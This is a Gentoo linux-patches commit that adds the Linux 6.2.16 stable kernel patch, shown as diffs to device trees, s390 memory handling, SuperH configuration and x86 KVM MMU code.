commit:     480b4d881d3b488f7d49d86245c0174a83599e8c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 17 13:17:21 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 17 13:17:21 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=480b4d88

Linux patch 6.2.16

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1015_linux-6.2.16.patch | 13917 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 13921 insertions(+)

diff --git a/0000_README b/0000_README
index c1153b54..e41e403e 100644
--- a/0000_README
+++ b/0000_README
@@ -103,6 +103,10 @@ Patch:  1014_linux-6.2.15.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.15
 
+Patch:  1015_linux-6.2.16.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.16
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1015_linux-6.2.16.patch b/1015_linux-6.2.16.patch
new file mode 100644
index 00000000..ee24dd24
--- /dev/null
+++ b/1015_linux-6.2.16.patch
@@ -0,0 +1,13917 @@
+diff --git a/Makefile b/Makefile
+index 9f535df81b033..e00c122401919 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 15
++SUBLEVEL = 16
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts b/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
+index 9b4cf5ebe6d5f..c62aff908ab48 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
+@@ -63,7 +63,7 @@
+ 		status = "okay";
+ 		m25p,fast-read;
+ 		label = "bmc";
+-		spi-max-frequency = <100000000>; /* 100 MHz */
++		spi-max-frequency = <50000000>; /* 50 MHz */
+ #include "openbmc-flash-layout.dtsi"
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts b/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
+index ff4c07c69af1c..4554abf0c7cdf 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
+@@ -31,7 +31,7 @@
+ 		};
+ 
+ 		system-fault {
+-			gpios = <&gpio ASPEED_GPIO(Z, 2) GPIO_ACTIVE_LOW>;
++			gpios = <&gpio ASPEED_GPIO(Z, 2) GPIO_ACTIVE_HIGH>;
+ 			panic-indicator;
+ 		};
+ 	};
+@@ -51,7 +51,7 @@
+ 		status = "okay";
+ 		m25p,fast-read;
+ 		label = "bmc";
+-		spi-max-frequency = <100000000>; /* 100 MHz */
++		spi-max-frequency = <50000000>; /* 50 MHz */
+ #include "openbmc-flash-layout-64.dtsi"
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/exynos4412-itop-elite.dts b/arch/arm/boot/dts/exynos4412-itop-elite.dts
+index 202ab0fee3b70..bfc79490e2e22 100644
+--- a/arch/arm/boot/dts/exynos4412-itop-elite.dts
++++ b/arch/arm/boot/dts/exynos4412-itop-elite.dts
+@@ -182,7 +182,7 @@
+ 		compatible = "wlf,wm8960";
+ 		reg = <0x1a>;
+ 		clocks = <&pmu_system_controller 0>;
+-		clock-names = "MCLK1";
++		clock-names = "mclk";
+ 		wlf,shared-lrclk;
+ 		#sound-dai-cells = <0>;
+ 	};
+diff --git a/arch/arm/boot/dts/s5pv210.dtsi b/arch/arm/boot/dts/s5pv210.dtsi
+index 12e90a1cc6a14..1a9e4a96b2ff7 100644
+--- a/arch/arm/boot/dts/s5pv210.dtsi
++++ b/arch/arm/boot/dts/s5pv210.dtsi
+@@ -566,7 +566,7 @@
+ 				interrupts = <29>;
+ 				clocks = <&clocks CLK_CSIS>,
+ 						<&clocks SCLK_CSIS>;
+-				clock-names = "clk_csis",
++				clock-names = "csis",
+ 						"sclk_csis";
+ 				bus-width = <4>;
+ 				status = "disabled";
+diff --git a/arch/riscv/kernel/Makefile b/arch/riscv/kernel/Makefile
+index 4cf303a779ab9..8d02b9d05738d 100644
+--- a/arch/riscv/kernel/Makefile
++++ b/arch/riscv/kernel/Makefile
+@@ -9,6 +9,7 @@ CFLAGS_REMOVE_patch.o	= $(CC_FLAGS_FTRACE)
+ CFLAGS_REMOVE_sbi.o	= $(CC_FLAGS_FTRACE)
+ endif
+ CFLAGS_syscall_table.o	+= $(call cc-option,-Wno-override-init,)
++CFLAGS_compat_syscall_table.o += $(call cc-option,-Wno-override-init,)
+ 
+ ifdef CONFIG_KEXEC
+ AFLAGS_kexec_relocate.o := -mcmodel=medany $(call cc-option,-mno-relax)
+diff --git a/arch/riscv/mm/pageattr.c b/arch/riscv/mm/pageattr.c
+index 86c56616e5dea..ea3d61de065b3 100644
+--- a/arch/riscv/mm/pageattr.c
++++ b/arch/riscv/mm/pageattr.c
+@@ -217,18 +217,26 @@ bool kernel_page_present(struct page *page)
+ 	pgd = pgd_offset_k(addr);
+ 	if (!pgd_present(*pgd))
+ 		return false;
++	if (pgd_leaf(*pgd))
++		return true;
+ 
+ 	p4d = p4d_offset(pgd, addr);
+ 	if (!p4d_present(*p4d))
+ 		return false;
++	if (p4d_leaf(*p4d))
++		return true;
+ 
+ 	pud = pud_offset(p4d, addr);
+ 	if (!pud_present(*pud))
+ 		return false;
++	if (pud_leaf(*pud))
++		return true;
+ 
+ 	pmd = pmd_offset(pud, addr);
+ 	if (!pmd_present(*pmd))
+ 		return false;
++	if (pmd_leaf(*pmd))
++		return true;
+ 
+ 	pte = pte_offset_kernel(pmd, addr);
+ 	return pte_present(*pte);
+diff --git a/arch/s390/kernel/uv.c b/arch/s390/kernel/uv.c
+index 9f18a4af9c131..cb2ee06df286c 100644
+--- a/arch/s390/kernel/uv.c
++++ b/arch/s390/kernel/uv.c
+@@ -192,21 +192,10 @@ static int expected_page_refs(struct page *page)
+ 	return res;
+ }
+ 
+-static int make_secure_pte(pte_t *ptep, unsigned long addr,
+-			   struct page *exp_page, struct uv_cb_header *uvcb)
++static int make_page_secure(struct page *page, struct uv_cb_header *uvcb)
+ {
+-	pte_t entry = READ_ONCE(*ptep);
+-	struct page *page;
+ 	int expected, cc = 0;
+ 
+-	if (!pte_present(entry))
+-		return -ENXIO;
+-	if (pte_val(entry) & _PAGE_INVALID)
+-		return -ENXIO;
+-
+-	page = pte_page(entry);
+-	if (page != exp_page)
+-		return -ENXIO;
+ 	if (PageWriteback(page))
+ 		return -EAGAIN;
+ 	expected = expected_page_refs(page);
+@@ -304,17 +293,18 @@ again:
+ 		goto out;
+ 
+ 	rc = -ENXIO;
+-	page = follow_page(vma, uaddr, FOLL_WRITE);
+-	if (IS_ERR_OR_NULL(page))
+-		goto out;
+-
+-	lock_page(page);
+ 	ptep = get_locked_pte(gmap->mm, uaddr, &ptelock);
+-	if (should_export_before_import(uvcb, gmap->mm))
+-		uv_convert_from_secure(page_to_phys(page));
+-	rc = make_secure_pte(ptep, uaddr, page, uvcb);
++	if (pte_present(*ptep) && !(pte_val(*ptep) & _PAGE_INVALID) && pte_write(*ptep)) {
++		page = pte_page(*ptep);
++		rc = -EAGAIN;
++		if (trylock_page(page)) {
++			if (should_export_before_import(uvcb, gmap->mm))
++				uv_convert_from_secure(page_to_phys(page));
++			rc = make_page_secure(page, uvcb);
++			unlock_page(page);
++		}
++	}
+ 	pte_unmap_unlock(ptep, ptelock);
+-	unlock_page(page);
+ out:
+ 	mmap_read_unlock(gmap->mm);
+ 
+diff --git a/arch/s390/kvm/pv.c b/arch/s390/kvm/pv.c
+index e032ebbf51b97..3ce5f4351156a 100644
+--- a/arch/s390/kvm/pv.c
++++ b/arch/s390/kvm/pv.c
+@@ -314,6 +314,11 @@ int kvm_s390_pv_set_aside(struct kvm *kvm, u16 *rc, u16 *rrc)
+ 	 */
+ 	if (kvm->arch.pv.set_aside)
+ 		return -EINVAL;
++
++	/* Guest with segment type ASCE, refuse to destroy asynchronously */
++	if ((kvm->arch.gmap->asce & _ASCE_TYPE_MASK) == _ASCE_TYPE_SEGMENT)
++		return -EINVAL;
++
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
+diff --git a/arch/s390/mm/gmap.c b/arch/s390/mm/gmap.c
+index 74e1d873dce05..784fc6cbddb1a 100644
+--- a/arch/s390/mm/gmap.c
++++ b/arch/s390/mm/gmap.c
+@@ -2830,6 +2830,9 @@ EXPORT_SYMBOL_GPL(s390_unlist_old_asce);
+  * s390_replace_asce - Try to replace the current ASCE of a gmap with a copy
+  * @gmap: the gmap whose ASCE needs to be replaced
+  *
++ * If the ASCE is a SEGMENT type then this function will return -EINVAL,
++ * otherwise the pointers in the host_to_guest radix tree will keep pointing
++ * to the wrong pages, causing use-after-free and memory corruption.
+  * If the allocation of the new top level page table fails, the ASCE is not
+  * replaced.
+  * In any case, the old ASCE is always removed from the gmap CRST list.
+@@ -2844,6 +2847,10 @@ int s390_replace_asce(struct gmap *gmap)
+ 
+ 	s390_unlist_old_asce(gmap);
+ 
++	/* Replacing segment type ASCEs would cause serious issues */
++	if ((gmap->asce & _ASCE_TYPE_MASK) == _ASCE_TYPE_SEGMENT)
++		return -EINVAL;
++
+ 	page = alloc_pages(GFP_KERNEL_ACCOUNT, CRST_ALLOC_ORDER);
+ 	if (!page)
+ 		return -ENOMEM;
+diff --git a/arch/sh/Kconfig.debug b/arch/sh/Kconfig.debug
+index 10290e5c1f438..c449e7c1b20ff 100644
+--- a/arch/sh/Kconfig.debug
++++ b/arch/sh/Kconfig.debug
+@@ -15,7 +15,7 @@ config SH_STANDARD_BIOS
+ 
+ config STACK_DEBUG
+ 	bool "Check for stack overflows"
+-	depends on DEBUG_KERNEL
++	depends on DEBUG_KERNEL && PRINTK
+ 	help
+ 	  This option will cause messages to be printed if free stack space
+ 	  drops below a certain limit. Saying Y here will add overhead to
+diff --git a/arch/sh/kernel/head_32.S b/arch/sh/kernel/head_32.S
+index 4adbd4ade3194..b603b7968b388 100644
+--- a/arch/sh/kernel/head_32.S
++++ b/arch/sh/kernel/head_32.S
+@@ -64,7 +64,7 @@ ENTRY(_stext)
+ 	ldc	r0, r6_bank
+ #endif
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ 	mov	r4, r12		! Store device tree blob pointer in r12
+ #endif
+ 	
+@@ -315,7 +315,7 @@ ENTRY(_stext)
+ 10:		
+ #endif
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ 	mov.l	8f, r0		! Make flat device tree available early.
+ 	jsr	@r0
+ 	 mov	r12, r4
+@@ -346,7 +346,7 @@ ENTRY(stack_start)
+ 5:	.long	start_kernel
+ 6:	.long	cpu_init
+ 7:	.long	init_thread_union
+-#if defined(CONFIG_OF_FLATTREE)
++#if defined(CONFIG_OF_EARLY_FLATTREE)
+ 8:	.long	sh_fdt_init
+ #endif
+ 
+diff --git a/arch/sh/kernel/nmi_debug.c b/arch/sh/kernel/nmi_debug.c
+index 11777867c6f5f..a212b645b4cf8 100644
+--- a/arch/sh/kernel/nmi_debug.c
++++ b/arch/sh/kernel/nmi_debug.c
+@@ -49,7 +49,7 @@ static int __init nmi_debug_setup(char *str)
+ 	register_die_notifier(&nmi_debug_nb);
+ 
+ 	if (*str != '=')
+-		return 0;
++		return 1;
+ 
+ 	for (p = str + 1; *p; p = sep + 1) {
+ 		sep = strchr(p, ',');
+@@ -70,6 +70,6 @@ static int __init nmi_debug_setup(char *str)
+ 			break;
+ 	}
+ 
+-	return 0;
++	return 1;
+ }
+ __setup("nmi_debug", nmi_debug_setup);
+diff --git a/arch/sh/kernel/setup.c b/arch/sh/kernel/setup.c
+index 1fcb6659822a3..af977ec4ca5e5 100644
+--- a/arch/sh/kernel/setup.c
++++ b/arch/sh/kernel/setup.c
+@@ -244,7 +244,7 @@ void __init __weak plat_early_device_setup(void)
+ {
+ }
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ void __ref sh_fdt_init(phys_addr_t dt_phys)
+ {
+ 	static int done = 0;
+@@ -326,7 +326,7 @@ void __init setup_arch(char **cmdline_p)
+ 	/* Let earlyprintk output early console messages */
+ 	sh_early_platform_driver_probe("earlyprintk", 1, 1);
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ #ifdef CONFIG_USE_BUILTIN_DTB
+ 	unflatten_and_copy_device_tree();
+ #else
+diff --git a/arch/sh/math-emu/sfp-util.h b/arch/sh/math-emu/sfp-util.h
+index 784f541344f36..bda50762b3d33 100644
+--- a/arch/sh/math-emu/sfp-util.h
++++ b/arch/sh/math-emu/sfp-util.h
+@@ -67,7 +67,3 @@
+   } while (0)
+ 
+ #define abort()	return 0
+-
+-#define __BYTE_ORDER __LITTLE_ENDIAN
+-
+-
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index 24480b4f1c575..adc3149c833a9 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1342,21 +1342,12 @@ struct kvm_arch {
+ 	struct task_struct *nx_huge_page_recovery_thread;
+ 
+ #ifdef CONFIG_X86_64
+-	/*
+-	 * Whether the TDP MMU is enabled for this VM. This contains a
+-	 * snapshot of the TDP MMU module parameter from when the VM was
+-	 * created and remains unchanged for the life of the VM. If this is
+-	 * true, TDP MMU handler functions will run for various MMU
+-	 * operations.
+-	 */
+-	bool tdp_mmu_enabled;
+-
+ 	/* The number of TDP MMU pages across all roots. */
+ 	atomic64_t tdp_mmu_pages;
+ 
+ 	/*
+-	 * List of kvm_mmu_page structs being used as roots.
+-	 * All kvm_mmu_page structs in the list should have
++	 * List of struct kvm_mmu_pages being used as roots.
++	 * All struct kvm_mmu_pages in the list should have
+ 	 * tdp_mmu_page set.
+ 	 *
+ 	 * For reads, this list is protected by:
+diff --git a/arch/x86/kernel/amd_nb.c b/arch/x86/kernel/amd_nb.c
+index 4266b64631a46..7e331e8f36929 100644
+--- a/arch/x86/kernel/amd_nb.c
++++ b/arch/x86/kernel/amd_nb.c
+@@ -36,6 +36,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M50H_DF_F4 0x166e
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F4 0x14e4
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F4 0x14f4
++#define PCI_DEVICE_ID_AMD_19H_M78H_DF_F4 0x12fc
+ 
+ /* Protect the PCI config register pairs used for SMN. */
+ static DEFINE_MUTEX(smn_mutex);
+@@ -79,6 +80,7 @@ static const struct pci_device_id amd_nb_misc_ids[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M50H_DF_F3) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M60H_DF_F3) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M70H_DF_F3) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M78H_DF_F3) },
+ 	{}
+ };
+ 
+diff --git a/arch/x86/kvm/kvm_cache_regs.h b/arch/x86/kvm/kvm_cache_regs.h
+index c09174f73a344..451697a96cf33 100644
+--- a/arch/x86/kvm/kvm_cache_regs.h
++++ b/arch/x86/kvm/kvm_cache_regs.h
+@@ -4,7 +4,7 @@
+ 
+ #include <linux/kvm_host.h>
+ 
+-#define KVM_POSSIBLE_CR0_GUEST_BITS X86_CR0_TS
++#define KVM_POSSIBLE_CR0_GUEST_BITS	(X86_CR0_TS | X86_CR0_WP)
+ #define KVM_POSSIBLE_CR4_GUEST_BITS				  \
+ 	(X86_CR4_PVI | X86_CR4_DE | X86_CR4_PCE | X86_CR4_OSFXSR  \
+ 	 | X86_CR4_OSXMMEXCPT | X86_CR4_PGE | X86_CR4_TSD | X86_CR4_FSGSBASE)
+diff --git a/arch/x86/kvm/mmu.h b/arch/x86/kvm/mmu.h
+index 6bdaacb6faa07..0f38b78ab04b7 100644
+--- a/arch/x86/kvm/mmu.h
++++ b/arch/x86/kvm/mmu.h
+@@ -113,6 +113,8 @@ void kvm_init_shadow_ept_mmu(struct kvm_vcpu *vcpu, bool execonly,
+ bool kvm_can_do_async_pf(struct kvm_vcpu *vcpu);
+ int kvm_handle_page_fault(struct kvm_vcpu *vcpu, u64 error_code,
+ 				u64 fault_address, char *insn, int insn_len);
++void __kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++					struct kvm_mmu *mmu);
+ 
+ int kvm_mmu_load(struct kvm_vcpu *vcpu);
+ void kvm_mmu_unload(struct kvm_vcpu *vcpu);
+@@ -153,6 +155,24 @@ static inline void kvm_mmu_load_pgd(struct kvm_vcpu *vcpu)
+ 					  vcpu->arch.mmu->root_role.level);
+ }
+ 
++static inline void kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++						    struct kvm_mmu *mmu)
++{
++	/*
++	 * When EPT is enabled, KVM may passthrough CR0.WP to the guest, i.e.
++	 * @mmu's snapshot of CR0.WP and thus all related paging metadata may
++	 * be stale.  Refresh CR0.WP and the metadata on-demand when checking
++	 * for permission faults.  Exempt nested MMUs, i.e. MMUs for shadowing
++	 * nEPT and nNPT, as CR0.WP is ignored in both cases.  Note, KVM does
++	 * need to refresh nested_mmu, a.k.a. the walker used to translate L2
++	 * GVAs to GPAs, as that "MMU" needs to honor L2's CR0.WP.
++	 */
++	if (!tdp_enabled || mmu == &vcpu->arch.guest_mmu)
++		return;
++
++	__kvm_mmu_refresh_passthrough_bits(vcpu, mmu);
++}
++
+ /*
+  * Check if a given access (described through the I/D, W/R and U/S bits of a
+  * page fault error code pfec) causes a permission fault with the given PTE
+@@ -184,8 +204,12 @@ static inline u8 permission_fault(struct kvm_vcpu *vcpu, struct kvm_mmu *mmu,
+ 	u64 implicit_access = access & PFERR_IMPLICIT_ACCESS;
+ 	bool not_smap = ((rflags & X86_EFLAGS_AC) | implicit_access) == X86_EFLAGS_AC;
+ 	int index = (pfec + (not_smap << PFERR_RSVD_BIT)) >> 1;
+-	bool fault = (mmu->permissions[index] >> pte_access) & 1;
+ 	u32 errcode = PFERR_PRESENT_MASK;
++	bool fault;
++
++	kvm_mmu_refresh_passthrough_bits(vcpu, mmu);
++
++	fault = (mmu->permissions[index] >> pte_access) & 1;
+ 
+ 	WARN_ON(pfec & (PFERR_PK_MASK | PFERR_RSVD_MASK));
+ 	if (unlikely(mmu->pkru_mask)) {
+@@ -230,14 +254,14 @@ static inline bool kvm_shadow_root_allocated(struct kvm *kvm)
+ }
+ 
+ #ifdef CONFIG_X86_64
+-static inline bool is_tdp_mmu_enabled(struct kvm *kvm) { return kvm->arch.tdp_mmu_enabled; }
++extern bool tdp_mmu_enabled;
+ #else
+-static inline bool is_tdp_mmu_enabled(struct kvm *kvm) { return false; }
++#define tdp_mmu_enabled false
+ #endif
+ 
+ static inline bool kvm_memslots_have_rmaps(struct kvm *kvm)
+ {
+-	return !is_tdp_mmu_enabled(kvm) || kvm_shadow_root_allocated(kvm);
++	return !tdp_mmu_enabled || kvm_shadow_root_allocated(kvm);
+ }
+ 
+ static inline gfn_t gfn_to_index(gfn_t gfn, gfn_t base_gfn, int level)
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index 835426254e768..dcca08a08bd0c 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -99,6 +99,13 @@ module_param_named(flush_on_reuse, force_flush_and_sync_on_reuse, bool, 0644);
+  */
+ bool tdp_enabled = false;
+ 
++bool __ro_after_init tdp_mmu_allowed;
++
++#ifdef CONFIG_X86_64
++bool __read_mostly tdp_mmu_enabled = true;
++module_param_named(tdp_mmu, tdp_mmu_enabled, bool, 0444);
++#endif
++
+ static int max_huge_page_level __read_mostly;
+ static int tdp_root_level __read_mostly;
+ static int max_tdp_level __read_mostly;
+@@ -233,6 +240,20 @@ static struct kvm_mmu_role_regs vcpu_to_role_regs(struct kvm_vcpu *vcpu)
+ 	return regs;
+ }
+ 
++static unsigned long get_guest_cr3(struct kvm_vcpu *vcpu)
++{
++	return kvm_read_cr3(vcpu);
++}
++
++static inline unsigned long kvm_mmu_get_guest_pgd(struct kvm_vcpu *vcpu,
++						  struct kvm_mmu *mmu)
++{
++	if (IS_ENABLED(CONFIG_RETPOLINE) && mmu->get_guest_pgd == get_guest_cr3)
++		return kvm_read_cr3(vcpu);
++
++	return mmu->get_guest_pgd(vcpu);
++}
++
+ static inline bool kvm_available_flush_tlb_with_range(void)
+ {
+ 	return kvm_x86_ops.tlb_remote_flush_with_range;
+@@ -1279,7 +1300,7 @@ static void kvm_mmu_write_protect_pt_masked(struct kvm *kvm,
+ {
+ 	struct kvm_rmap_head *rmap_head;
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_clear_dirty_pt_masked(kvm, slot,
+ 				slot->base_gfn + gfn_offset, mask, true);
+ 
+@@ -1312,7 +1333,7 @@ static void kvm_mmu_clear_dirty_pt_masked(struct kvm *kvm,
+ {
+ 	struct kvm_rmap_head *rmap_head;
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_clear_dirty_pt_masked(kvm, slot,
+ 				slot->base_gfn + gfn_offset, mask, false);
+ 
+@@ -1395,7 +1416,7 @@ bool kvm_mmu_slot_gfn_write_protect(struct kvm *kvm,
+ 		}
+ 	}
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		write_protected |=
+ 			kvm_tdp_mmu_write_protect_gfn(kvm, slot, gfn, min_level);
+ 
+@@ -1558,7 +1579,7 @@ bool kvm_unmap_gfn_range(struct kvm *kvm, struct kvm_gfn_range *range)
+ 	if (kvm_memslots_have_rmaps(kvm))
+ 		flush = kvm_handle_gfn_range(kvm, range, kvm_zap_rmap);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		flush = kvm_tdp_mmu_unmap_gfn_range(kvm, range, flush);
+ 
+ 	return flush;
+@@ -1571,7 +1592,7 @@ bool kvm_set_spte_gfn(struct kvm *kvm, struct kvm_gfn_range *range)
+ 	if (kvm_memslots_have_rmaps(kvm))
+ 		flush = kvm_handle_gfn_range(kvm, range, kvm_set_pte_rmap);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		flush |= kvm_tdp_mmu_set_spte_gfn(kvm, range);
+ 
+ 	return flush;
+@@ -1646,7 +1667,7 @@ bool kvm_age_gfn(struct kvm *kvm, struct kvm_gfn_range *range)
+ 	if (kvm_memslots_have_rmaps(kvm))
+ 		young = kvm_handle_gfn_range(kvm, range, kvm_age_rmap);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		young |= kvm_tdp_mmu_age_gfn_range(kvm, range);
+ 
+ 	return young;
+@@ -1659,7 +1680,7 @@ bool kvm_test_age_gfn(struct kvm *kvm, struct kvm_gfn_range *range)
+ 	if (kvm_memslots_have_rmaps(kvm))
+ 		young = kvm_handle_gfn_range(kvm, range, kvm_test_age_rmap);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		young |= kvm_tdp_mmu_test_age_gfn(kvm, range);
+ 
+ 	return young;
+@@ -1921,7 +1942,7 @@ static bool is_obsolete_sp(struct kvm *kvm, struct kvm_mmu_page *sp)
+ 		return true;
+ 
+ 	/* TDP MMU pages do not use the MMU generation. */
+-	return !sp->tdp_mmu_page &&
++	return !is_tdp_mmu_page(sp) &&
+ 	       unlikely(sp->mmu_valid_gen != kvm->arch.mmu_valid_gen);
+ }
+ 
+@@ -3596,7 +3617,7 @@ static int mmu_alloc_direct_roots(struct kvm_vcpu *vcpu)
+ 	if (r < 0)
+ 		goto out_unlock;
+ 
+-	if (is_tdp_mmu_enabled(vcpu->kvm)) {
++	if (tdp_mmu_enabled) {
+ 		root = kvm_tdp_mmu_get_vcpu_root_hpa(vcpu);
+ 		mmu->root.hpa = root;
+ 	} else if (shadow_root_level >= PT64_ROOT_4LEVEL) {
+@@ -3699,7 +3720,7 @@ static int mmu_alloc_shadow_roots(struct kvm_vcpu *vcpu)
+ 	int quadrant, i, r;
+ 	hpa_t root;
+ 
+-	root_pgd = mmu->get_guest_pgd(vcpu);
++	root_pgd = kvm_mmu_get_guest_pgd(vcpu, mmu);
+ 	root_gfn = root_pgd >> PAGE_SHIFT;
+ 
+ 	if (mmu_check_root(vcpu, root_gfn))
+@@ -4149,7 +4170,7 @@ static bool kvm_arch_setup_async_pf(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa,
+ 	arch.token = alloc_apf_token(vcpu);
+ 	arch.gfn = gfn;
+ 	arch.direct_map = vcpu->arch.mmu->root_role.direct;
+-	arch.cr3 = vcpu->arch.mmu->get_guest_pgd(vcpu);
++	arch.cr3 = kvm_mmu_get_guest_pgd(vcpu, vcpu->arch.mmu);
+ 
+ 	return kvm_setup_async_pf(vcpu, cr2_or_gpa,
+ 				  kvm_vcpu_gfn_to_hva(vcpu, gfn), &arch);
+@@ -4168,7 +4189,7 @@ void kvm_arch_async_page_ready(struct kvm_vcpu *vcpu, struct kvm_async_pf *work)
+ 		return;
+ 
+ 	if (!vcpu->arch.mmu->root_role.direct &&
+-	      work->arch.cr3 != vcpu->arch.mmu->get_guest_pgd(vcpu))
++	      work->arch.cr3 != kvm_mmu_get_guest_pgd(vcpu, vcpu->arch.mmu))
+ 		return;
+ 
+ 	kvm_mmu_do_page_fault(vcpu, work->cr2_or_gpa, 0, true);
+@@ -4530,11 +4551,6 @@ void kvm_mmu_new_pgd(struct kvm_vcpu *vcpu, gpa_t new_pgd)
+ }
+ EXPORT_SYMBOL_GPL(kvm_mmu_new_pgd);
+ 
+-static unsigned long get_cr3(struct kvm_vcpu *vcpu)
+-{
+-	return kvm_read_cr3(vcpu);
+-}
+-
+ static bool sync_mmio_spte(struct kvm_vcpu *vcpu, u64 *sptep, gfn_t gfn,
+ 			   unsigned int access)
+ {
+@@ -5038,6 +5054,21 @@ kvm_calc_cpu_role(struct kvm_vcpu *vcpu, const struct kvm_mmu_role_regs *regs)
+ 	return role;
+ }
+ 
++void __kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++					struct kvm_mmu *mmu)
++{
++	const bool cr0_wp = !!kvm_read_cr0_bits(vcpu, X86_CR0_WP);
++
++	BUILD_BUG_ON((KVM_MMU_CR0_ROLE_BITS & KVM_POSSIBLE_CR0_GUEST_BITS) != X86_CR0_WP);
++	BUILD_BUG_ON((KVM_MMU_CR4_ROLE_BITS & KVM_POSSIBLE_CR4_GUEST_BITS));
++
++	if (is_cr0_wp(mmu) == cr0_wp)
++		return;
++
++	mmu->cpu_role.base.cr0_wp = cr0_wp;
++	reset_guest_paging_metadata(vcpu, mmu);
++}
++
+ static inline int kvm_mmu_get_tdp_level(struct kvm_vcpu *vcpu)
+ {
+ 	/* tdp_root_level is architecture forced level, use it if nonzero */
+@@ -5085,7 +5116,7 @@ static void init_kvm_tdp_mmu(struct kvm_vcpu *vcpu,
+ 	context->page_fault = kvm_tdp_page_fault;
+ 	context->sync_page = nonpaging_sync_page;
+ 	context->invlpg = NULL;
+-	context->get_guest_pgd = get_cr3;
++	context->get_guest_pgd = get_guest_cr3;
+ 	context->get_pdptr = kvm_pdptr_read;
+ 	context->inject_page_fault = kvm_inject_page_fault;
+ 
+@@ -5235,7 +5266,7 @@ static void init_kvm_softmmu(struct kvm_vcpu *vcpu,
+ 
+ 	kvm_init_shadow_mmu(vcpu, cpu_role);
+ 
+-	context->get_guest_pgd     = get_cr3;
++	context->get_guest_pgd     = get_guest_cr3;
+ 	context->get_pdptr         = kvm_pdptr_read;
+ 	context->inject_page_fault = kvm_inject_page_fault;
+ }
+@@ -5249,7 +5280,7 @@ static void init_kvm_nested_mmu(struct kvm_vcpu *vcpu,
+ 		return;
+ 
+ 	g_context->cpu_role.as_u64   = new_mode.as_u64;
+-	g_context->get_guest_pgd     = get_cr3;
++	g_context->get_guest_pgd     = get_guest_cr3;
+ 	g_context->get_pdptr         = kvm_pdptr_read;
+ 	g_context->inject_page_fault = kvm_inject_page_fault;
+ 
+@@ -5719,6 +5750,9 @@ void kvm_configure_mmu(bool enable_tdp, int tdp_forced_root_level,
+ 	tdp_root_level = tdp_forced_root_level;
+ 	max_tdp_level = tdp_max_root_level;
+ 
++#ifdef CONFIG_X86_64
++	tdp_mmu_enabled = tdp_mmu_allowed && tdp_enabled;
++#endif
+ 	/*
+ 	 * max_huge_page_level reflects KVM's MMU capabilities irrespective
+ 	 * of kernel support, e.g. KVM may be capable of using 1GB pages when
+@@ -5966,7 +6000,7 @@ static void kvm_mmu_zap_all_fast(struct kvm *kvm)
